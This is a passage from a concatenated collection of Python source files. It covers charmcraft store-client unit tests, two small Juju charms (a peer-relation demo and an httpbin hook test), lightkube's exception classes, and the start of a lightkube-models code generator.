"revisions": [{"status": "more-revisions", "revision": None, "errors": None}]
}
status_response_3 = {
"revisions": [
{"status": test_status_ok, "revision": test_revision, "errors": None}
]
}
client_mock.get.side_effect = [
status_response_1,
status_response_2,
status_response_3,
]
test_status_resolution = "clean and crispy"
fake_statuses = {test_status_ok: test_status_resolution}
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
with patch("charmcraft.commands.store.store.POLL_DELAY", 0.01):
result = store._upload("/test/endpoint/", "some-filepath")
# check the status-checking client calls (kept going until third one)
assert client_mock.mock_calls[2:] == [
call.get(test_status_url),
call.get(test_status_url),
call.get(test_status_url),
]
    # check the result, which must carry the values from the final response
assert result.ok == test_status_resolution
assert result.status == test_status_ok
assert result.revision == test_revision
# check logs
expected = [
"Upload test-upload-id started, got status url https://store.c.c/status",
"Status checked: " + str(status_response_1),
"Status checked: " + str(status_response_2),
"Status checked: " + str(status_response_3),
]
assert expected == [rec.message for rec in caplog.records]
def test_upload_error(client_mock, config):
"""The upload ended in error."""
store = Store(config.charmhub)
# the first response, for when pushing bytes
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
# the second response, for telling the store it was pushed
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
# the third response, status in error (note the patched UPLOAD_ENDING_STATUSES below)
test_revision = 123
test_status_bad = "test-status"
status_response = {
"revisions": [
{
"status": test_status_bad,
"revision": test_revision,
"errors": [
{"message": "error text 1", "code": "error-code-1"},
{"message": "error text 2", "code": "error-code-2"},
],
}
]
}
client_mock.get.return_value = status_response
test_status_resolution = "test-ok-or-not"
fake_statuses = {test_status_bad: test_status_resolution}
test_filepath = "test-filepath"
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
result = store._upload("/test/endpoint/", test_filepath)
# check result
assert result.ok == test_status_resolution
assert result.status == test_status_bad
assert result.revision == test_revision
error1, error2 = result.errors
assert error1.message == "error text 1"
assert error1.code == "error-code-1"
assert error2.message == "error text 2"
assert error2.code == "error-code-2"
def test_upload_charmbundles_endpoint(config):
"""The bundle/charm upload prepares ok the endpoint and calls the generic _upload."""
store = Store(config.charmhub)
test_results = "test-results"
with patch.object(store, "_upload") as mock:
mock.return_value = test_results
result = store.upload("test-charm", "test-filepath")
mock.assert_called_once_with("/v1/charm/test-charm/revisions", "test-filepath")
assert result == test_results
def test_upload_resources_endpoint(config):
"""The resource upload prepares ok the endpoint and calls the generic _upload."""
store = Store(config.charmhub)
test_results = "test-results"
with patch.object(store, "_upload") as mock:
mock.return_value = test_results
result = store.upload_resource(
"test-charm", "test-resource", "test-type", "test-filepath"
)
expected_endpoint = "/v1/charm/test-charm/resources/test-resource/revisions"
mock.assert_called_once_with(
expected_endpoint, "test-filepath", extra_fields={"type": "test-type"}
)
assert result == test_results
def test_upload_including_extra_parameters(client_mock, caplog, config):
"""Verify that the upload includes extra parameters if given."""
caplog.set_level(logging.DEBUG, logger="charmcraft.commands")
store = Store(config.charmhub)
# the first response, for when pushing bytes
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
# the second response, for telling the store it was pushed
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
# the third response, status ok (note the patched UPLOAD_ENDING_STATUSES below)
test_revision = 123
test_status_ok = "test-status"
status_response = {
"revisions": [
{"status": test_status_ok, "revision": test_revision, "errors": None}
]
}
client_mock.get.return_value = status_response
test_status_resolution = "test-ok-or-not"
fake_statuses = {test_status_ok: test_status_resolution}
test_filepath = "test-filepath"
test_endpoint = "/v1/test/revisions/endpoint/"
extra_fields = {"extra-key": "1", "more": "2"}
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
store._upload(test_endpoint, test_filepath, extra_fields=extra_fields)
# check all client calls
assert client_mock.mock_calls == [
call.push(test_filepath),
call.post(
test_endpoint, {"upload-id": test_upload_id, "extra-key": "1", "more": "2"}
),
call.get(test_status_url),
]
# -- tests for list revisions
def test_list_revisions_ok(client_mock, config):
"""One revision ok."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"revisions": [
{
"revision": 7,
"version": "v7",
"created-at": "2020-06-29T22:11:00.123",
"status": "approved",
"errors": None,
}
]
}
result = store.list_revisions("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/revisions")]
(item,) = result
assert item.revision == 7
assert item.version == "v7"
assert item.created_at == parser.parse("2020-06-29T22:11:00.123")
assert item.status == "approved"
assert item.errors == []
def test_list_revisions_empty(client_mock, config):
"""No revisions listed."""
store = Store(config.charmhub)
client_mock.get.return_value = {"revisions": []}
result = store.list_revisions("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/revisions")]
assert result == []
def test_list_revisions_errors(client_mock, config):
"""One revision with errors."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"revisions": [
{
"revision": 7,
"version": "v7",
"created-at": "2020-06-29T22:11:00.123",
"status": "rejected",
"errors": [
{"message": "error text 1", "code": "error-code-1"},
{"message": "error text 2", "code": "error-code-2"},
],
}
]
}
result = store.list_revisions("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/revisions")]
(item,) = result
error1, error2 = item.errors
assert error1.message == "error text 1"
assert error1.code == "error-code-1"
assert error2.message == "error text 2"
assert error2.code == "error-code-2"
def test_list_revisions_several_mixed(client_mock, config):
"""All cases mixed."""
client_mock.get.return_value = {
"revisions": [
{
"revision": 1,
"version": "v1",
"created-at": "2020-06-29T22:11:01",
"status": "rejected",
"errors": [
{"message": "error", "code": "code"},
],
},
{
"revision": 2,
"version": "v2",
"created-at": "2020-06-29T22:11:02",
"status": "approved",
"errors": None,
},
]
}
store = Store(config.charmhub)
result = store.list_revisions("some-name")
(item1, item2) = result
assert item1.revision == 1
assert item1.version == "v1"
assert item1.created_at == parser.parse("2020-06-29T22:11:01")
assert item1.status == "rejected"
(error,) = item1.errors
assert error.message == "error"
assert error.code == "code"
assert item2.revision == 2
assert item2.version == "v2"
assert item2.created_at == parser.parse("2020-06-29T22:11:02")
assert item2.status == "approved"
assert item2.errors == []
# -- tests for release
def test_release_simple(client_mock, config):
"""Releasing a revision into one channel."""
store = Store(config.charmhub)
store.release("testname", 123, ["somechannel"], [])
expected_body = [{"revision": 123, "channel": "somechannel", "resources": []}]
assert client_mock.mock_calls == [
call.post("/v1/charm/testname/releases", expected_body),
]
def test_release_multiple_channels(client_mock, config):
"""Releasing a revision into multiple channels."""
store = Store(config.charmhub)
store.release("testname", 123, ["channel1", "channel2", "channel3"], [])
expected_body = [
{"revision": 123, "channel": "channel1", "resources": []},
{"revision": 123, "channel": "channel2", "resources": []},
{"revision": 123, "channel": "channel3", "resources": []},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/testname/releases", expected_body),
]
def test_release_with_resources(client_mock, config):
"""Releasing with resources attached."""
store = Store(config.charmhub)
r1 = ResourceOption(name="foo", revision=3)
r2 = ResourceOption(name="bar", revision=17)
store.release("testname", 123, ["channel1", "channel2"], [r1, r2])
expected_body = [
{
"revision": 123,
"channel": "channel1",
"resources": [
{"name": "foo", "revision": 3},
{"name": "bar", "revision": 17},
],
},
{
"revision": 123,
"channel": "channel2",
"resources": [
{"name": "foo", "revision": 3},
{"name": "bar", "revision": 17},
],
},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/testname/releases", expected_body),
]
# -- tests for status
def test_status_ok(client_mock, config):
"""Get all the release information."""
client_mock.get.return_value = {
"channel-map": [
{
"channel": "latest/beta",
"expiration-date": None,
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 5,
"when": "2020-07-16T18:45:24Z",
"resources": [],
},
{
"channel": "latest/edge/mybranch",
"expiration-date": "2020-08-16T18:46:02Z",
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 10,
"when": "2020-07-16T18:46:02Z",
"resources": [],
},
],
"package": {
"channels": [
{
"branch": None,
"fallback": None,
"name": "latest/stable",
"risk": "stable",
"track": "latest",
},
{
"branch": "mybranch",
"fallback": "latest/stable",
"name": "latest/edge/mybranch",
"risk": "edge",
"track": "latest",
},
]
},
"revisions": [
{
"revision": 5,
"version": "5",
"created-at": "2020-06-29T22:11:05",
"status": "approved",
"errors": None,
},
{
"revision": 10,
"version": "63a852b",
"created-at": "2020-06-29T22:11:10",
"status": "approved",
"errors": None,
},
],
}
store = Store(config.charmhub)
channel_map, channels, revisions = store.list_releases("testname")
# check how the client is used
assert client_mock.mock_calls == [
call.get("/v1/charm/testname/releases"),
]
# check response
cmap1, cmap2 = channel_map
assert cmap1.revision == 5
assert cmap1.channel == "latest/beta"
assert cmap1.expires_at is None
assert cmap1.resources == []
assert cmap2.revision == 10
assert cmap2.channel == "latest/edge/mybranch"
assert cmap2.expires_at == parser.parse("2020-08-16T18:46:02Z")
assert cmap2.resources == []
channel1, channel2 = channels
assert channel1.name == "latest/stable"
assert channel1.track == "latest"
assert channel1.risk == "stable"
assert channel1.branch is None
assert channel2.name == "latest/edge/mybranch"
assert channel2.track == "latest"
assert channel2.risk == "edge"
assert channel2.branch == "mybranch"
rev1, rev2 = revisions
assert rev1.revision == 5
assert rev1.version == "5"
assert rev1.created_at == parser.parse("2020-06-29T22:11:05")
assert rev1.status == "approved"
assert rev1.errors == []
assert rev2.revision == 10
assert rev2.version == "63a852b"
assert rev2.created_at == parser.parse("2020-06-29T22:11:10")
assert rev2.status == "approved"
assert rev2.errors == []
def test_status_with_resources(client_mock, config):
"""Get all the release information."""
client_mock.get.return_value = {
"channel-map": [
{
"channel": "latest/stable",
"expiration-date": None,
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 5,
"when": "2020-07-16T18:45:24Z",
"resources": [
{
"name": "test-resource-1",
"revision": 2,
"type": "file",
},
],
},
{
"channel": "latest/edge",
"expiration-date": "2020-08-16T18:46:02Z",
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 5,
"when": "2020-07-16T18:46:02Z",
"resources": [
{
"name": "test-resource-1",
"revision": 2,
"type": "file",
},
{
"name": "test-resource-2",
"revision": 329,
"type": "file",
},
],
},
],
"package": {
"channels": [
{
"branch": None,
"fallback": None,
"name": "latest/edge",
"risk": "edge",
"track": "latest",
},
{
"branch": None,
"fallback": None,
"name": "latest/stable",
"risk": "stable",
"track": "latest",
},
]
},
"revisions": [
{
"revision": 5,
"version": "5",
"created-at": "2020-06-29T22:11:05",
"status": "approved",
"errors": None,
},
],
}
store = Store(config.charmhub)
channel_map, _, _ = store.list_releases("testname")
# check response
cmap1, cmap2 = channel_map
assert cmap1.revision == 5
assert cmap1.channel == "latest/stable"
assert cmap1.expires_at is None
(res,) = cmap1.resources
assert res.name == "test-resource-1"
assert res.revision == 2
assert res.resource_type == "file"
assert cmap2.revision == 5
assert cmap2.channel == "latest/edge"
assert cmap2.expires_at == parser.parse("2020-08-16T18:46:02Z")
(res1, res2) = cmap2.resources
assert res1.name == "test-resource-1"
assert res1.revision == 2
assert res1.resource_type == "file"
assert res2.name == "test-resource-2"
assert res2.revision == 329
assert res2.resource_type == "file"
# -- tests for library related functions
def test_create_library_id(client_mock, config):
"""Create a new library in the store."""
store = Store(config.charmhub)
client_mock.post.return_value = {"library-id": "test-lib-id"}
result = store.create_library_id("test-charm-name", "test-lib-name")
assert client_mock.mock_calls == [
call.post(
"/v1/charm/libraries/test-charm-name", {"library-name": "test-lib-name"}
),
]
assert result == "test-lib-id"
def test_create_library_revision(client_mock, config):
"""Create a new library revision in the store."""
test_charm_name = "test-charm-name"
test_lib_name = "test-lib-name"
test_lib_id = "test-lib-id"
test_api = "test-api-version"
test_patch = "test-patch-version"
test_content = "test content with quite a lot of funny Python code :p"
test_hash = "1234"
store = Store(config.charmhub)
client_mock.post.return_value = {
"api": test_api,
"content": test_content,
"hash": test_hash,
"library-id": test_lib_id,
"library-name": test_lib_name,
"charm-name": test_charm_name,
"patch": test_patch,
}
result_lib = store.create_library_revision(
test_charm_name, test_lib_id, test_api, test_patch, test_content, test_hash
)
payload = {
"api": test_api,
"patch": test_patch,
"content": test_content,
"hash": test_hash,
}
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/test-charm-name/" + test_lib_id, payload),
]
assert result_lib.api == test_api
assert result_lib.content == test_content
assert result_lib.content_hash == test_hash
assert result_lib.lib_id == test_lib_id
assert result_lib.lib_name == test_lib_name
assert result_lib.charm_name == test_charm_name
assert result_lib.patch == test_patch
def test_get_library(client_mock, config):
"""Get all the information (including content) for a library revision."""
test_charm_name = "test-charm-name"
test_lib_name = "test-lib-name"
test_lib_id = "test-lib-id"
test_api = "test-api-version"
test_patch = "test-patch-version"
test_content = "test content with quite a lot of funny Python code :p"
test_hash = "1234"
store = Store(config.charmhub)
client_mock.get.return_value = {
"api": test_api,
"content": test_content,
"hash": test_hash,
"library-id": test_lib_id,
"library-name": test_lib_name,
"charm-name": test_charm_name,
"patch": test_patch,
}
result_lib = store.get_library(test_charm_name, test_lib_id, test_api)
assert client_mock.mock_calls == [
call.get(
"/v1/charm/libraries/test-charm-name/{}?api={}".format(
test_lib_id, test_api
)
),
]
assert result_lib.api == test_api
assert result_lib.content == test_content
assert result_lib.content_hash == test_hash
assert result_lib.lib_id == test_lib_id
assert result_lib.lib_name == test_lib_name
assert result_lib.charm_name == test_charm_name
assert result_lib.patch == test_patch
def test_get_tips_simple(client_mock, config):
"""Get info for a lib, simple case with successful result."""
test_charm_name = "test-charm-name"
test_lib_name = "test-lib-name"
test_lib_id = "test-lib-id"
test_api = "test-api-version"
test_patch = "test-patch-version"
test_content = "test content with quite a lot of funny Python code :p"
test_hash = "1234"
store = Store(config.charmhub)
client_mock.post.return_value = {
"libraries": [
{
"api": test_api,
"content": test_content,
"hash": test_hash,
"library-id": test_lib_id,
"library-name": test_lib_name,
"charm-name": test_charm_name,
"patch": test_patch,
}
]
}
query_info = [
{"lib_id": test_lib_id},
]
result = store.get_libraries_tips(query_info)
payload = [
{"library-id": test_lib_id},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
expected = {
(test_lib_id, test_api): Library(
api=test_api,
content=test_content,
content_hash=test_hash,
lib_id=test_lib_id,
lib_name=test_lib_name,
charm_name=test_charm_name,
patch=test_patch,
),
}
assert result == expected
def test_get_tips_empty(client_mock, config):
"""Get info for a lib, with an empty response."""
test_lib_id = "test-lib-id"
store = Store(config.charmhub)
client_mock.post.return_value = {"libraries": []}
query_info = [
{"lib_id": test_lib_id},
]
result = store.get_libraries_tips(query_info)
payload = [
{"library-id": test_lib_id},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
assert result == {}
def test_get_tips_several(client_mock, config):
"""Get info for multiple libs at once."""
test_charm_name_1 = "test-charm-name-1"
test_lib_name_1 = "test-lib-name-1"
test_lib_id_1 = "test-lib-id-1"
test_api_1 = "test-api-version-1"
test_patch_1 = "test-patch-version-1"
test_content_1 = "test content with quite a lot of funny Python code :p"
test_hash_1 = "1234"
test_charm_name_2 = "test-charm-name-2"
test_lib_name_2 = "test-lib-name-2"
test_lib_id_2 = "test-lib-id-2"
test_api_2 = "test-api-version-2"
test_patch_2 = "test-patch-version-2"
test_content_2 = "more awesome Python code :)"
test_hash_2 = "5678"
store = Store(config.charmhub)
client_mock.post.return_value = {
"libraries": [
{
"api": test_api_1,
"content": test_content_1,
"hash": test_hash_1,
"library-id": test_lib_id_1,
"library-name": test_lib_name_1,
"charm-name": test_charm_name_1,
"patch": test_patch_1,
},
{
"api": test_api_2,
"content": test_content_2,
"hash": test_hash_2,
"library-id": test_lib_id_2,
"library-name": test_lib_name_2,
"charm-name": test_charm_name_2,
"patch": test_patch_2,
},
]
}
query_info = [
{"lib_id": test_lib_id_1},
{"lib_id": test_lib_id_2},
]
result = store.get_libraries_tips(query_info)
payload = [
{"library-id": test_lib_id_1},
{"library-id": test_lib_id_2},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
expected = {
(test_lib_id_1, test_api_1): Library(
api=test_api_1,
content=test_content_1,
content_hash=test_hash_1,
lib_id=test_lib_id_1,
lib_name=test_lib_name_1,
charm_name=test_charm_name_1,
patch=test_patch_1,
),
(test_lib_id_2, test_api_2): Library(
api=test_api_2,
content=test_content_2,
content_hash=test_hash_2,
lib_id=test_lib_id_2,
lib_name=test_lib_name_2,
charm_name=test_charm_name_2,
patch=test_patch_2,
),
}
assert result == expected
def test_get_tips_query_combinations(client_mock, config):
"""Use all the combinations to specify what's queried."""
store = Store(config.charmhub)
client_mock.post.return_value = {"libraries": []}
query_info = [
{"lib_id": "test-lib-id-1"},
{"lib_id": "test-lib-id-2", "api": 2},
{"charm_name": "test-charm-name-3"},
{"charm_name": "test-charm-name-4", "api": 4},
{"charm_name": "test-charm-name-5", "lib_name": "test-lib-name-5"},
{"charm_name": "test-charm-name-6", "lib_name": "test-lib-name-6", "api": 6},
]
store.get_libraries_tips(query_info)
payload = [
{"library-id": "test-lib-id-1"},
{"library-id": "test-lib-id-2", "api": 2},
{"charm-name": "test-charm-name-3"},
{"charm-name": "test-charm-name-4", "api": 4},
{"charm-name": "test-charm-name-5", "library-name": "test-lib-name-5"},
{
"charm-name": "test-charm-name-6",
"library-name": "test-lib-name-6",
"api": 6,
},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
# -- tests for list resources
def test_list_resources_ok(client_mock, config):
"""One resource ok."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"resources": [
{
"name": "testresource",
"optional": True,
"revision": 9,
"type": "file",
},
]
}
result = store.list_resources("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/resources")]
(item,) = result
assert item.name == "testresource"
assert item.optional
assert item.revision == 9
assert item.resource_type == "file"
def test_list_resources_empty(client_mock, config):
"""No resources listed."""
store = Store(config.charmhub)
client_mock.get.return_value = {"resources": []}
result = store.list_resources("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/resources")]
assert result == []
def test_list_resources_several(client_mock, config):
"""Several items returned."""
client_mock.get.return_value = {
"resources": [
{
"name": "testresource1",
"optional": True,
"revision": 123,
"type": "file",
},
{
"name": "testresource2",
"optional": False,
"revision": 678,
"type": "file",
},
]
}
store = Store(config.charmhub)
result = store.list_resources("some-name")
(item1, item2) = result
assert item1.name == "testresource1"
assert item1.optional is True
assert item1.revision == 123
assert item1.resource_type == "file"
assert item2.name == "testresource2"
assert item2.optional is False
assert item2.revision == 678
assert item2.resource_type == "file"
# -- tests for list resource revisions
def test_list_resource_revisions_ok(client_mock, config):
"""One resource revision ok."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"revisions": [
{
"created-at": "2021-02-11T13:43:22.396606",
"name": "otherstuff",
"revision": 1,
"sha256": "1bf0399c2de1240777ba73785f1ff1de5331f12853765a0",
"sha3-384": "deb9369cb2b9e86ad44160e93da43d240e6388c5dc67b8e2a5a3c2a36a26fe4c89",
"sha384": "eaaba6aa119da415e6ad778358a8530c47fefbe3ceced258e8c25530107dc7908e",
"sha512": (
"b8cfe885d49285d8546885167a72fd56ea23480e17c9cdd8e06b45239d79b774c6d6fc09d"
),
"size": 500,
},
]
}
result = store.list_resource_revisions("charm-name", "resource-name")
assert client_mock.mock_calls == [
call.get("/v1/charm/charm-name/resources/resource-name/revisions")
]
(item,) = result
assert item.revision == 1
assert item.created_at == parser.parse("2021-02-11T13:43:22.396606")
assert item.size == 500
def test_list_resource_revisions_empty(client_mock, config):
"""No resource revisions listed."""
store = Store(config.charmhub)
client_mock.get.return_value = {"revisions": []}
result = store.list_resource_revisions("charm-name", "resource-name")
assert client_mock.mock_calls == [
call.get("/v1/charm/charm-name/resources/resource-name/revisions")
]
assert result == []
def test_list_resource_revisions_several(client_mock, config):
"""Several items returned."""
client_mock.get.return_value = {
"revisions": [
{
"created-at": "2021-02-11T13:43:22.396606",
"name": "otherstuff",
"revision": 1,
"sha256": "1bf0399c2de1240777ba73785f1ff1de5331f12853765a0",
"sha3-384": "deb9369cb2b9e86ad44160e93da43d240e6388c5dc67b8e2a5a3c2a36a26fe4c89",
"sha384": "eaaba6aa119da415e6ad778358a8530c47fefbe3ceced258e8c25530107dc7908e",
"sha512": (
"b8cfe885d49285d8546885167a72fd56ea23480e17c9cdd8e06b45239d79b774c6d6fc09d"
),
"size": 500,
},
{
"created-at": "2021-02-11T14:23:55.659148",
"name": "otherstuff",
"revision": 2,
"sha256": "73785f1ff1de5331f12853765a01bf0399c2de1240777ba",
"sha3-384": "60e93da43d240e6388c5dc67b8e2a5a3c2a36a26fe4c89deb9369cb2b5e86ad441",
"sha384": "778358a8530c47fefbe3ceced258e8c25530107dc7908eeaaba6aa119dad15e6ad",
"sha512": (
"05167a72fd56ea23480e17c9cdd8e06b45239d79b774c6d6fc09db8cfe885d49285d8547c"
),
"size": 420,
},
]
}
store = Store(config.charmhub)
result = store.list_resource_revisions("charm-name", "resource-name")
(item1, item2) = result
assert item1.revision == 1
assert item1.created_at == parser.parse("2021-02-11T13:43:22.396606")
assert item1.size == 500
assert item2.revision == 2
assert item2.created_at == parser.parse("2021-02-11T14:23:55.659148")
assert item2.size == 420
``` |
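The `test_get_tips_query_combinations` case above pins down how the user-facing query keys map onto the `/v1/charm/libraries/bulk` payload. Below is a minimal, hedged sketch of just that translation step; the key names come from the test, while `_KEY_MAP` and `build_tips_payload` are invented names, and the real `Store.get_libraries_tips` also posts the payload and parses the returned libraries.

```python
# Hedged sketch of the query translation implied by the tests above.
_KEY_MAP = {
    "lib_id": "library-id",
    "charm_name": "charm-name",
    "lib_name": "library-name",
    "api": "api",
}

def build_tips_payload(query_info):
    """Translate query dicts into the /v1/charm/libraries/bulk payload."""
    return [
        {_KEY_MAP[key]: value for key, value in entry.items()}
        for entry in query_info
    ]

# Example mirroring test_get_tips_query_combinations:
print(build_tips_payload([{"lib_id": "test-lib-id-2", "api": 2}]))
# -> [{'library-id': 'test-lib-id-2', 'api': 2}]
```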
{
"source": "jnsgruk/charm-demo-peer-relation",
"score": 2
} |
#### File: charm-demo-peer-relation/src/charm.py
```python
import logging
from ops.charm import (
CharmBase,
LeaderElectedEvent,
PebbleReadyEvent,
RelationChangedEvent,
RelationDepartedEvent,
RelationJoinedEvent,
)
from ops.framework import StoredState
from ops.main import main
from ops.model import ActiveStatus
logger = logging.getLogger(__name__)
class PeerRelationDemoCharm(CharmBase):
"""A simple charm with a placeholder workload used to demonstrate
how peer relations are formed, and how the relation data can be
accessed and manipulated
"""
_stored = StoredState()
def __init__(self, *args):
super().__init__(*args)
self.framework.observe(self.on.demo_pebble_ready, self._on_demo_pebble_ready)
# Handle the case where Juju elects a new application leader
self.framework.observe(self.on.leader_elected, self._on_leader_elected)
# Handle the various relation events
self.framework.observe(self.on.replicas_relation_joined, self._on_replicas_relation_joined)
self.framework.observe(self.on.replicas_relation_departed, self._on_replicas_relation_departed)
self.framework.observe(self.on.replicas_relation_changed, self._on_replicas_relation_changed)
self._stored.set_default(leader_ip="")
def _on_leader_elected(self, event: LeaderElectedEvent) -> None:
"""Handle the leader-elected event"""
logging.debug("Leader %s setting some data!", self.unit.name)
# Get the peer relation object
peer_relation = self.model.get_relation("replicas")
# Get the bind address from the juju model
# Convert to string as relation data must always be a string
ip = str(self.model.get_binding(peer_relation).network.bind_address)
# Update some data to trigger a replicas_relation_changed event
peer_relation.data[self.app].update({"leader-ip": ip})
def _on_replicas_relation_joined(self, event: RelationJoinedEvent) -> None:
"""Handle relation-joined event for the replicas relation"""
logger.debug("Hello from %s to %s", self.unit.name, event.unit.name)
# Check if we're the leader
if self.unit.is_leader():
# Get the bind address from the juju model
ip = str(self.model.get_binding(event.relation).network.bind_address)
logging.debug("Leader %s setting some data!", self.unit.name)
event.relation.data[self.app].update({"leader-ip": ip})
# Update our unit data bucket in the relation
event.relation.data[self.unit].update({"unit-data": self.unit.name})
def _on_replicas_relation_departed(self, event: RelationDepartedEvent) -> None:
"""Handle relation-departed event for the replicas relation"""
logger.debug("Goodbye from %s to %s", self.unit.name, event.unit.name)
def _on_replicas_relation_changed(self, event: RelationChangedEvent) -> None:
"""Handle relation-changed event for the replicas relation"""
logging.debug("Unit %s can see the following data: %s", self.unit.name, event.relation.data.keys())
# Fetch an item from the application data bucket
leader_ip_value = event.relation.data[self.app].get("leader-ip")
# Store the latest copy locally in our state store
if leader_ip_value and leader_ip_value != self._stored.leader_ip:
self._stored.leader_ip = leader_ip_value
def _on_demo_pebble_ready(self, event: PebbleReadyEvent) -> None:
"""Handle the demo-pebble-ready event"""
self.unit.status = ActiveStatus()
if __name__ == "__main__":
main(PeerRelationDemoCharm)
``` |
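For completeness, a hedged sketch of the read side: any unit of the charm above can recover the leader's address from the same `replicas` application data bucket. `get_leader_ip` is a hypothetical helper, not part of the charm.

```python
# Hypothetical helper, assuming the "replicas" peer relation and the
# "leader-ip" key written by PeerRelationDemoCharm._on_leader_elected.
def get_leader_ip(charm):
    relation = charm.model.get_relation("replicas")
    if relation is None:
        # Peer relation not created yet
        return None
    return relation.data[charm.app].get("leader-ip")
```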
{
"source": "jnsgruk/hook-test",
"score": 2
} |
#### File: hook-test/src/charm.py
```python
import logging
from ops.charm import CharmBase
from ops.main import main
from ops.model import ActiveStatus
logger = logging.getLogger(__name__)
class HookTestCharm(CharmBase):
def __init__(self, *args):
super().__init__(*args)
self.framework.observe(self.on.httpbin_pebble_ready, self._on_httpbin_pebble_ready)
self.framework.observe(self.on.stop, self._on_stop)
self.framework.observe(self.on.remove, self._on_remove)
def _on_stop(self, event):
logger.info("REMOVE EVENT\nREMOVE EVENT\nREMOVE EVENT")
def _on_remove(self, event):
logger.info("REMOVE EVENT\nREMOVE EVENT\nREMOVE EVENT")
def _on_httpbin_pebble_ready(self, event):
"""Define and start a workload using the Pebble API."""
container = event.workload
pebble_layer = {
"services": {
"httpbin": {
"override": "replace",
"summary": "httpbin",
"command": "gunicorn -b 0.0.0.0:80 httpbin:app -k gevent",
"startup": "enabled",
"environment": {},
}
},
}
container.add_layer("httpbin", pebble_layer, combine=True)
container.autostart()
self.unit.status = ActiveStatus()
if __name__ == "__main__":
main(HookTestCharm)
``` |
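A minimal Harness-based check of the Pebble layer above, in the same style as the prometheus-operator tests later in this file. This is a sketch only: it assumes the file is importable as `charm` and asserts nothing beyond what `_on_httpbin_pebble_ready` sets.

```python
# Hedged sketch of a unit test for HookTestCharm.
import unittest
from ops.testing import Harness
from charm import HookTestCharm  # assumed module name

class TestHookTestCharm(unittest.TestCase):
    def setUp(self):
        self.harness = Harness(HookTestCharm)
        self.addCleanup(self.harness.cleanup)
        self.harness.begin()

    def test_httpbin_pebble_ready_sets_plan(self):
        # Fire the pebble-ready event for the "httpbin" container
        self.harness.container_pebble_ready("httpbin")
        plan = self.harness.get_container_pebble_plan("httpbin").to_dict()
        command = plan["services"]["httpbin"]["command"]
        self.assertIn("gunicorn", command)
```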
{
"source": "jnsgruk/lightkube",
"score": 3
} |
#### File: lightkube/core/exceptions.py
```python
import httpx
from .internal_models import meta_v1
class ConfigError(Exception):
"""
Configuration specific errors.
"""
pass
class ApiError(httpx.HTTPStatusError):
status: 'meta_v1.Status'
def __init__(
self, request: httpx.Request = None, response: httpx.Response = None) -> None:
self.status = meta_v1.Status.from_dict(response.json())
super().__init__(self.status.message, request=request, response=response)
class LoadResourceError(Exception):
"""
Error in loading a resource
"""
``` |
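A short, hedged usage sketch of `ApiError`: a failed API call surfaces the Kubernetes `Status` object on the exception, so callers can branch on the status code. The client call, resource import, and cluster availability are illustrative assumptions.

```python
# Illustrative only; assumes a reachable cluster and the usual lightkube imports.
from lightkube import Client
from lightkube.resources.core_v1 import Pod
from lightkube.core.exceptions import ApiError

client = Client()
try:
    client.get(Pod, name="does-not-exist", namespace="default")
except ApiError as err:
    # err.status is the meta_v1.Status parsed in ApiError.__init__ above.
    print(err.status.code, err.status.reason)
```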
{
"source": "jnsgruk/lightkube-models",
"score": 2
} |
#### File: lightkube-models/lightkube-generate/compile_models.py
```python
import json
import re
from collections import defaultdict
from typing import List
import shutil
from pathlib import Path
from .get_template import get_template
from .model import Model, Import
RE_MODEL = re.compile("^.*[.](apis?|pkg)[.]")
def collect_imports(module: Import, models: List[Model]):
imports = set()
for model in models:
if model.has_properties:
for prop in model.properties:
if prop.import_module:
imports.add(prop.import_module)
else:
if model.import_module:
imports.add(model.import_module)
if module in imports:
imports.remove(module)
return imports
def build_module(path: Path, modules, version, compiler_major):
p = path.joinpath("models")
if p.exists():
shutil.rmtree(p)
p.mkdir()
tmpl = get_template("models.tmpl")
for module, models in modules.items():
module_name = p.joinpath(f"{module}.py")
with module_name.open("w") as fw:
fw.write(
tmpl.render(models=models, modules=collect_imports(Import(".", module), models)))
print(f"Generated {module_name} with {len(models)} models")
with p.joinpath("__init__.py").open("w") as fw:
fw.write(f'__version__ = "{version}.{compiler_major}"\n')
def sort_key(module_name):
"""
v1alpha1 -> 1.-2.1
v1alpha2 -> 1.-2.2
v1beta1 -> 1.-1.1
v1beta2 -> 1.-1.2
    v1 -> 1.0.0
"""
try:
version = module_name.split("_v", 1)[1]
except:
version = "1"
version = version.replace("alpha", ".-2.").replace("beta", ".-1.")
version = [int(x) for x in version.split(".")]
version += [0] * (3 - len(version))
return tuple(version)
def build_docs(docsdir: Path, modules, version):
version = version.rsplit(".", 1)[0]
docsdir = docsdir.joinpath("models")
if docsdir.exists():
shutil.rmtree(docsdir)
docsdir.mkdir()
docs_tmpl = get_template("models_docs.tmpl")
for module, models in modules.items():
